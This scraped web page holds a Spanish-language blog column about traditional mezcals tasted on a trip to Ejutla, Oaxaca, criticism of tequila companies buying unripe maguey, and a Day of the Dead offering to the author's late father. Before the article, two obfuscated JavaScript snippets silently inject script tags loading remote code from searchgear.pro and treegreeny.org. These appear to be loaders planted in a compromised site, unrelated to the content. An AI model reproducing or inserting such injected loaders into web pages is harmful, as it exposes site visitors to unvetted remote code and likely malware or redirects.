;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 152. Viaje a Ejutla y altar de muertos

152. Viaje a Ejutla y altar de muertos


En mi reciente viaje al distrito de Ejutla, Oaxaca, nuevamente quedé sorprendido por la diversidad, complejidad y riqueza de los mezcales tradicionales (MT), que constaté en la pequeña -y al tiempo extraordinaria- muestra de diez MT que me compartieron algunos maestros mezcalilleros y que incluyó:

a) Mezcal de puntas de maguey Tobalá, mayo de 2012.
b) Mezcal de maguey Mexicano, maguey San Martinero y maguey Tobasiche,  julio 2012.

c) Mezcal de maguey Barril, octubre 2012.

d) Mezcal de puntas de maguey Mexicano y maguey de Castilla, marzo de 2012
e) Seis mezcales de maguey Espadín; uno de marzo 2011, cinco de 2012. Todos de Yogana, pero de diferentes fábricas y maestros mezcalilleros.

Con la saboreada de algunas de estas joyas, reanudamos las sesiones de la Logia de los Mezcólatras, y logramos profundizar un poco más en el conocimiento de los sabores, aromas y del gusto histórico de los MT de Yogana y de la región occidental del distrito de Ejutla, donde se localiza esta población.

También durante el viaje, los maestros mezcalilleros comentaron que, nuevamente, empresas tequileras de “gran prestigio” se han dado a la tarea de ir a Oaxaca a comprar maguey para llevarlo a Jalisco y hacer “tequila” (luego comentaré de uno bueno que me consiguieron a 56.7º), lo que demuestra la actitud permanentemente fraudulenta y mentirosa de esta industria y de las autoridades quela toleran. Perolo que más sorprendió a quienes me informaron lo anterior, es que se llevaran magueyes tiernos, sin azúcares y enfermos y, por tanto, sin condiciones de calidad necesarias para ser usados.

Concluyo diciendo que ayer viernes 1º, a las 0:00 y ante el altar de muertos de la familia, recibimos a mi padre con un buen trago de mezcal de maguey Tobalá -de Yogana- en puntas (58.6º), con empanadas de amarillo y de verde, fruta, chapulines, sal de belatobes, chocolate, queso cotija (aunque no es oaxaqueño, le encantaba) y, por supuesto, con la música que tanto le gustaba: el jarabe ejuteco y muchas chilenas.

http://www.milenio.com/cdb/doc/impreso/9163410

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *